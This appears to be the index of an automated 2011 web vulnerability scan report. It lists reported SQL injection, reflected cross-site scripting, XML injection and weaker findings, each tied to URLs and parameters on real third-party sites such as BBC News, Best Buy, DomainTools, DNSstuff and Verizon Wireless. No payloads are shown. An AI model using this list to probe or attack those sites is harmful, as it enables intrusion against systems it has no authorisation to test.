XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07182011-01

Report generated by XSS.CX at Mon Jul 18 08:49:18 CDT 2011.

1. SQL injection

1.1. http://googleads.g.doubleclick.net/pagead/ads [dt parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter]

1.3. http://www.dnsstuff.com/l/ [Referer HTTP header]

1.4. http://www.dnsstuff.com/l/ [User-Agent HTTP header]

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 1]

3.2. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 2]

3.3. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [callback parameter]

3.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [name of an arbitrarily supplied request parameter]

3.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [pageSize parameter]

3.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [show parameter]

3.7. http://cgibin.erols.com/favicon.ico [REST URL parameter 1]

3.8. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 1]

3.9. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 2]

3.10. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 3]

3.11. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 4]

3.12. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [name of an arbitrarily supplied request parameter]

3.13. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.14. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.15. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.16. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.17. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.18. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.19. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.20. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.21. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.30. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.31. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.32. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.33. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.34. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.35. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.36. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.37. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.38. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.39. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.40. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.41. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.42. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.43. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.44. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.45. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.46. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.47. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.48. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.49. http://jqueryui.com/themeroller/ [fcActive parameter]

3.50. http://jqueryui.com/themeroller/ [fcContent parameter]

3.51. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.52. http://jqueryui.com/themeroller/ [fcError parameter]

3.53. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.54. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.55. http://jqueryui.com/themeroller/ [fcHover parameter]

3.56. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.57. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.58. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.59. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.60. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.61. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.62. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.63. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.64. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.65. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.66. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.67. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.68. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.69. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.70. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.71. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.72. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

3.73. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

3.74. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

3.75. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

3.76. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

3.77. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

3.78. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

3.79. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

3.80. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

3.81. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

3.82. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

3.83. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

3.84. https://secure.domaintools.com/join/ [REST URL parameter 1]

3.85. https://secure.domaintools.com/join/ [REST URL parameter 1]

3.86. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

3.87. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

3.88. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

3.89. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

3.90. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]

3.91. http://wireless.amazon.com/alohaCartRequest [zip parameter]

3.92. http://www.bestbuy.com/site/olstemplatemapper.jsp [_DARGS parameter]

3.93. http://www.dnsstuff.com/tools/ipall/ [ip parameter]

3.94. http://www.dnsstuff.com/tools/ipall/ [name of an arbitrarily supplied request parameter]

3.95. http://www.dnsstuff.com/tools/ipall/ [token parameter]

3.96. http://www.dnsstuff.com/tools/ipall/ [tool_id parameter]

3.97. http://www.dnsstuff.com/tools/ipall/ [toolhandler_redirect parameter]

3.98. http://www.dnsstuff.com/tools/ipall/a [name of an arbitrarily supplied request parameter]

3.99. http://www.dnsstuff.com/tools/ipall/a/ [name of an arbitrarily supplied request parameter]

3.100. http://www.domaintools.com/about/ [REST URL parameter 1]

3.101. http://www.domaintools.com/about/ [REST URL parameter 1]

3.102. http://www.domaintools.com/about/big-changes/ [REST URL parameter 2]

3.103. http://www.domaintools.com/about/big-changes/ [REST URL parameter 2]

3.104. http://www.domaintools.com/about/contact-us/ [REST URL parameter 2]

3.105. http://www.domaintools.com/about/contact-us/ [REST URL parameter 2]

3.106. http://www.domaintools.com/about/features-and-pricing/ [REST URL parameter 2]

3.107. http://www.domaintools.com/about/features-and-pricing/ [REST URL parameter 2]

3.108. http://www.domaintools.com/about/join-our-team/ [REST URL parameter 2]

3.109. http://www.domaintools.com/about/join-our-team/ [REST URL parameter 2]

3.110. http://www.domaintools.com/about/learn-more/ [REST URL parameter 2]

3.111. http://www.domaintools.com/about/learn-more/ [REST URL parameter 2]

3.112. http://www.domaintools.com/about/privacy-policy/ [REST URL parameter 2]

3.113. http://www.domaintools.com/about/privacy-policy/ [REST URL parameter 2]

3.114. http://www.domaintools.com/about/terms-of-service/ [REST URL parameter 2]

3.115. http://www.domaintools.com/about/terms-of-service/ [REST URL parameter 2]

3.116. http://www.domaintools.com/about/why-domain-tools/ [REST URL parameter 2]

3.117. http://www.domaintools.com/about/why-domain-tools/ [REST URL parameter 2]

3.118. http://www.domaintools.com/api/ [REST URL parameter 1]

3.119. http://www.domaintools.com/api/ [REST URL parameter 1]

3.120. http://www.domaintools.com/buy/ [REST URL parameter 1]

3.121. http://www.domaintools.com/buy/ [REST URL parameter 1]

3.122. http://www.domaintools.com/buy/availability-check/ [REST URL parameter 2]

3.123. http://www.domaintools.com/buy/availability-check/ [REST URL parameter 2]

3.124. http://www.domaintools.com/buy/domain-search/ [REST URL parameter 2]

3.125. http://www.domaintools.com/buy/domain-search/ [REST URL parameter 2]

3.126. http://www.domaintools.com/buy/domain-suggestions/ [REST URL parameter 2]

3.127. http://www.domaintools.com/buy/domain-suggestions/ [REST URL parameter 2]

3.128. http://www.domaintools.com/buy/domain-typo-finder/ [REST URL parameter 2]

3.129. http://www.domaintools.com/buy/domain-typo-finder/ [REST URL parameter 2]

3.130. http://www.domaintools.com/buy/dropping-names/ [REST URL parameter 2]

3.131. http://www.domaintools.com/buy/dropping-names/ [REST URL parameter 2]

3.132. http://www.domaintools.com/buy/for-sale/ [REST URL parameter 2]

3.133. http://www.domaintools.com/buy/for-sale/ [REST URL parameter 2]

3.134. http://www.domaintools.com/buy/sales-history/ [REST URL parameter 2]

3.135. http://www.domaintools.com/buy/sales-history/ [REST URL parameter 2]

3.136. http://www.domaintools.com/go/ [REST URL parameter 1]

3.137. http://www.domaintools.com/go/ [REST URL parameter 1]

3.138. http://www.domaintools.com/join/ [REST URL parameter 1]

3.139. http://www.domaintools.com/join/ [REST URL parameter 1]

3.140. http://www.domaintools.com/learn/ [REST URL parameter 1]

3.141. http://www.domaintools.com/learn/ [REST URL parameter 1]

3.142. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/ [REST URL parameter 2]

3.143. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/ [REST URL parameter 2]

3.144. http://www.domaintools.com/learn/help/ [REST URL parameter 2]

3.145. http://www.domaintools.com/learn/help/ [REST URL parameter 2]

3.146. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/ [REST URL parameter 2]

3.147. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/ [REST URL parameter 2]

3.148. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/ [REST URL parameter 2]

3.149. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/ [REST URL parameter 2]

3.150. http://www.domaintools.com/monitor/ [REST URL parameter 1]

3.151. http://www.domaintools.com/monitor/ [REST URL parameter 1]

3.152. http://www.domaintools.com/monitor/domain-monitor/ [REST URL parameter 2]

3.153. http://www.domaintools.com/monitor/domain-monitor/ [REST URL parameter 2]

3.154. http://www.domaintools.com/monitor/name-server-alert/ [REST URL parameter 2]

3.155. http://www.domaintools.com/monitor/name-server-alert/ [REST URL parameter 2]

3.156. http://www.domaintools.com/monitor/registrant-alert/ [REST URL parameter 2]

3.157. http://www.domaintools.com/monitor/registrant-alert/ [REST URL parameter 2]

3.158. http://www.domaintools.com/monitor/trademark-alert/ [REST URL parameter 2]

3.159. http://www.domaintools.com/monitor/trademark-alert/ [REST URL parameter 2]

3.160. http://www.domaintools.com/research/ [REST URL parameter 1]

3.161. http://www.domaintools.com/research/ [REST URL parameter 1]

3.162. http://www.domaintools.com/research/dns/ [REST URL parameter 2]

3.163. http://www.domaintools.com/research/dns/ [REST URL parameter 2]

3.164. http://www.domaintools.com/research/hosting-history/ [REST URL parameter 2]

3.165. http://www.domaintools.com/research/hosting-history/ [REST URL parameter 2]

3.166. http://www.domaintools.com/research/name-server-report/ [REST URL parameter 2]

3.167. http://www.domaintools.com/research/name-server-report/ [REST URL parameter 2]

3.168. http://www.domaintools.com/research/reverse-ip/ [REST URL parameter 2]

3.169. http://www.domaintools.com/research/reverse-ip/ [REST URL parameter 2]

3.170. http://www.domaintools.com/research/reverse-whois/ [REST URL parameter 2]

3.171. http://www.domaintools.com/research/reverse-whois/ [REST URL parameter 2]

3.172. http://www.domaintools.com/research/whois-applications/ [REST URL parameter 2]

3.173. http://www.domaintools.com/research/whois-applications/ [REST URL parameter 2]

3.174. http://www.domaintools.com/research/whois-history/ [REST URL parameter 2]

3.175. http://www.domaintools.com/research/whois-history/ [REST URL parameter 2]

3.176. http://www.domaintools.com/sitemap/ [REST URL parameter 1]

3.177. http://www.domaintools.com/sitemap/ [REST URL parameter 1]

3.178. http://www.verizonwireless.com/b2c/shoppingAssistant [closeUrl parameter]

3.179. http://www.verizonwireless.com/b2c/shoppingAssistant [displayText parameter]

3.180. http://www.verizonwireless.com/b2c/shoppingAssistant [hasMultipleAssociatedSimTOs parameter]

3.181. http://www.verizonwireless.com/b2c/shoppingAssistant [name of an arbitrarily supplied request parameter]

3.182. http://www.verizonwireless.com/b2c/shoppingAssistant [phoneID parameter]

3.183. http://www.verizonwireless.com/b2c/shoppingAssistant [quantity parameter]

3.184. http://lookupserver.com/ [User-Agent HTTP header]

3.185. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

3.186. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

3.187. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [Referer HTTP header]

3.188. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [Referer HTTP header]

3.189. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [Referer HTTP header]

3.190. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [Referer HTTP header]

3.191. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

3.192. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [Referer HTTP header]

3.193. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [Referer HTTP header]

3.194. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [Referer HTTP header]

3.195. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [Referer HTTP header]

3.196. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

3.197. http://www.domaintools.com/learn/help/ [Referer HTTP header]

3.198. http://support.dnsstuff.com/ST.ashx [siteuidut cookie]

4. Flash cross-domain policy

4.1. http://ajax.googleapis.com/crossdomain.xml

4.2. http://feed.domaintoolsblog.com/crossdomain.xml

4.3. http://m.webtrends.com/crossdomain.xml

4.4. https://adwords.google.com/crossdomain.xml

4.5. http://cbk0.google.com/crossdomain.xml

4.6. https://cbks0.google.com/crossdomain.xml

4.7. http://feeds.bbci.co.uk/crossdomain.xml

4.8. http://googleads.g.doubleclick.net/crossdomain.xml

4.9. http://news.bbc.co.uk/crossdomain.xml

4.10. http://newsrss.bbc.co.uk/crossdomain.xml

4.11. http://pagead2.googlesyndication.com/crossdomain.xml

4.12. http://picasaweb.google.com/crossdomain.xml

4.13. http://docs.google.com/crossdomain.xml

4.14. http://khm0.google.com/crossdomain.xml

4.15. http://khm1.google.com/crossdomain.xml

4.16. http://mt0.google.com/crossdomain.xml

4.17. http://mt1.google.com/crossdomain.xml

4.18. http://mt2.google.com/crossdomain.xml

4.19. http://mt3.google.com/crossdomain.xml

5. Cleartext submission of password

5.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

5.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

5.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

5.4. http://cache.vzw.com/globalnav/globalnav.js

5.5. http://support.dnsstuff.com/Login.aspx

6. XML injection

6.1. http://mt0.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.2. http://mt0.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.3. http://mt1.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.4. http://mt1.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.5. http://mt2.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.6. http://mt2.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.7. http://mt3.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.8. http://mt3.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7. Session token in URL

7.1. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

7.2. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

7.3. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

7.4. http://www.bestbuy.com/site/olspage.jsp

7.5. http://www.facebook.com/extern/login_status.php

8. Password field submitted using GET method

8.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

8.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

8.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

9. Cookie scoped to parent domain

9.1. http://blog.domaintools.com/

9.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

9.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

9.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

9.5. http://cts-log.channelintelligence.com/

9.6. http://wireless.amazon.com/a

9.7. http://wireless.amazon.com/alohaCartRequest

9.8. https://adwords.google.com/um/StartNewLogin

9.9. http://akamai.invitemedia.com/set_partner_uid

9.10. http://ibid2252027210.peachd.dnsstuff.com/style.css

9.11. http://ibid2252027210.plumd.dnsstuff.com/style.css

9.12. http://ibid4216487243.plumd.dnsstuff.com/style.css

9.13. http://id.google.com/verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif

9.14. http://id.google.com/verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif

9.15. http://int.teracent.net/tase/int

9.16. http://picasaweb.google.com/lh/view

9.17. http://sales.liveperson.net/hc/44153975/

9.18. http://wireless.amazon.com/404

9.19. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

9.20. http://www.verizonwireless.com/b2c/vzwfly

10. Cookie without HttpOnly flag set

10.1. http://blog.domaintools.com/

10.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

10.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

10.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

10.5. http://cts-log.channelintelligence.com/

10.6. http://mad4milk.net/

10.7. http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx

10.8. http://mobilebeta.microsoft.com/en-us/default.mspx

10.9. http://partner.domaining.com/link/

10.10. http://support.domaintools.com/

10.11. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

10.12. http://wireless.amazon.com/a

10.13. http://wireless.amazon.com/alohaCartRequest

10.14. http://www.dnswatch.info/

10.15. http://www.domaining.com/

10.16. https://adwords.google.com/um/StartNewLogin

10.17. http://akamai.invitemedia.com/set_partner_uid

10.18. http://ibid2252027210.peachd.dnsstuff.com/style.css

10.19. http://ibid2252027210.plumd.dnsstuff.com/style.css

10.20. http://ibid4216487243.plumd.dnsstuff.com/style.css

10.21. http://int.teracent.net/tase/int

10.22. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

10.23. http://phones.microsoftstore.com/r.aspx

10.24. http://sales.liveperson.net/hc/44153975/

10.25. http://sales.liveperson.net/hc/44153975/

10.26. http://support.dnsstuff.com/KB/a20/fine-tuning-declude-v41-or-newer.aspx

10.27. http://support.dnsstuff.com/KB/a23/why-cant-i-get-my-ptr-record-from-the-dns-lookup-tool.aspx

10.28. http://support.dnsstuff.com/KB/a27/how-to-enable-and-configure-internal-message-sniffer.aspx

10.29. http://support.dnsstuff.com/KB/a28/how-the-spf-tool-works.aspx

10.30. http://support.dnsstuff.com/KB/a29/mail-server-test-center-mismatched-dns-result-explanation.aspx

10.31. http://support.dnsstuff.com/KB/a30/explanation-optional-server-the-reverse-dns-lookup-tool.aspx

10.32. http://support.dnsstuff.com/KB/a31/explanation-of-the-mail-server-test-center-anti-spam-test.aspx

10.33. http://support.dnsstuff.com/KB/a32/available-declude-variables.aspx

10.34. http://support.dnsstuff.com/News/1/default-news-item.aspx

10.35. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

10.36. http://wireless.amazon.com/404

10.37. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

10.38. http://www.verizonwireless.com/b2c/vzwfly

10.39. http://www35.vzw.com/HG

11. Password field with autocomplete enabled

11.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

11.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

11.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

11.4. http://dnsstuff.com/new-tools-a-upgrades

11.5. https://secure.domaintools.com/log-in/

11.6. https://secure.domaintools.com/log-in/

11.7. http://support.dnsstuff.com/Login.aspx

11.8. http://webcache.googleusercontent.com/search

11.9. https://webreps.satuitcrm.com/default.aspx

11.10. http://www.dnsstuff.com/

11.11. http://www.dnsstuff.com/bc-lookups-tools

11.12. http://www.dnsstuff.com/bc-mon-alerts

11.13. http://www.dnsstuff.com/index.php

11.14. http://www.dnsstuff.com/tools/ipall/

11.15. http://www.dnsstuff.com/tools/ipall/a/

12. Source code disclosure

12.1. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

12.2. http://images.bestbuy.com/BestBuy_US/store/js/admonitor-min.js

12.3. http://meyerweb.com/eric/tools/css/reset/

13. SSL certificate

13.1. https://webreps.satuitcrm.com/

13.2. https://adwords.google.com/

13.3. https://cbks0.google.com/

13.4. https://clients6.google.com/

13.5. https://fpdownload.macromedia.com/

13.6. https://plusone.google.com/

13.7. https://secure.domaintools.com/

13.8. https://ssl.gstatic.com/

13.9. https://www.dnsstuff.com/

14. ASP.NET debugging enabled

15. Referer-dependent response

15.1. http://www.bestbuy.com/site/olstemplatemapper.jsp

15.2. http://www.facebook.com/plugins/like.php

16. Cross-domain POST

16.1. http://blog.domaintools.com/

16.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

16.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

16.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

16.5. http://webcache.googleusercontent.com/search

16.6. http://www.dnsstuff.com/partner/dyn/

17. SSL cookie without secure flag set

18. Cross-domain Referer leakage

18.1. http://googleads.g.doubleclick.net/pagead/ads

18.2. http://googleads.g.doubleclick.net/pagead/ads

18.3. http://googleads.g.doubleclick.net/pagead/ads

18.4. http://groups.google.com/groups

18.5. http://jqueryui.com/themeroller/

18.6. http://maps.google.com/local_url

18.7. http://maps.google.com/maps

18.8. http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx

18.9. http://phones.microsoftstore.com/eCommerce/PowerReviews/pwr/engine/js/full.js

18.10. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

18.11. http://picasaweb.google.com/lh/view

18.12. https://secure.domaintools.com/log-in/

18.13. http://translate.google.com/translate_t

18.14. http://webcache.googleusercontent.com/search

18.15. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

18.16. http://www.bestbuy.com/site/HTC+-+Trophy+Mobile+Phone+-+Black+(Verizon+Wireless)/2330093.p

18.17. http://www.bestbuy.com/site/olstemplatemapper.jsp

18.18. http://www.dnsstuff.com/tools/ipall/

18.19. http://www.google.com/search

18.20. http://www.verizonwireless.com/b2c/dispatcher

18.21. http://www.verizonwireless.com/b2c/index.html

18.22. http://www.verizonwireless.com/b2c/shoppingAssistant

18.23. http://www.verizonwireless.com/b2c/store/controller

18.24. http://www.verizonwireless.com/b2c/store/controller

18.25. http://www.verizonwireless.com/b2c/store/controller

18.26. http://www.verizonwireless.com/b2c/store/controller

18.27. http://www.verizonwireless.com/b2c/store/controller

18.28. http://www.verizonwireless.com/b2c/store/controller

19. Cross-domain script include

19.1. http://blog.domaintools.com/

19.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

19.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

19.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

19.5. https://clients6.google.com/static/proxy.html

19.6. http://dyn.com/

19.7. http://dyn.com/please-try-again

19.8. http://feed.domaintoolsblog.com/domaintools/

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://images.bestbuy.com/BestBuy_US/store/js/dart-min.js

19.11. http://images.bestbuy.com/BestBuy_US/store/js/google-min.js

19.12. http://jqueryui.com/about

19.13. http://jqueryui.com/themeroller/

19.14. http://lookupserver.com/

19.15. http://mad4milk.net/

19.16. http://mobilebeta.microsoft.com/en-us/default.mspx

19.17. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm

19.18. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm

19.19. http://news.bbc.co.uk/sport2/hi/football/14168601.stm

19.20. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm

19.21. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm

19.22. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm

19.23. http://picasaweb.google.com/lh/view

19.24. http://satuit.com/

19.25. http://satuit.com/en/Products/SatuitSIP.aspx

19.26. http://satuit.com/products.aspx

19.27. https://secure.domaintools.com/join/

19.28. https://secure.domaintools.com/log-in/

19.29. https://secure.domaintools.com/shopping-cart/

19.30. http://whois.domaintools.com/

19.31. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

19.32. http://www.bestbuy.com/site/HTC+-+Trophy+Mobile+Phone+-+Black+(Verizon+Wireless)/2330093.p

19.33. http://www.dnsstuff.com/partner/dyn/

19.34. http://www.dnsstuff.com/tools/ipall/

19.35. http://www.dnsstuff.com/tools/ipall/a/

19.36. http://www.dnswatch.info/

19.37. http://www.domaintools.com/

19.38. http://www.domaintools.com/about/

19.39. http://www.domaintools.com/about/big-changes/

19.40. http://www.domaintools.com/about/contact-us/

19.41. http://www.domaintools.com/about/features-and-pricing/

19.42. http://www.domaintools.com/about/join-our-team/

19.43. http://www.domaintools.com/about/learn-more/

19.44. http://www.domaintools.com/about/privacy-policy/

19.45. http://www.domaintools.com/about/terms-of-service/

19.46. http://www.domaintools.com/about/why-domain-tools/

19.47. http://www.domaintools.com/api/

19.48. http://www.domaintools.com/buy/

19.49. http://www.domaintools.com/buy/availability-check/

19.50. http://www.domaintools.com/buy/domain-search/

19.51. http://www.domaintools.com/buy/domain-suggestions/

19.52. http://www.domaintools.com/buy/domain-typo-finder/

19.53. http://www.domaintools.com/buy/dropping-names/

19.54. http://www.domaintools.com/buy/for-sale/

19.55. http://www.domaintools.com/buy/sales-history/

19.56. http://www.domaintools.com/learn/

19.57. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/

19.58. http://www.domaintools.com/learn/help/

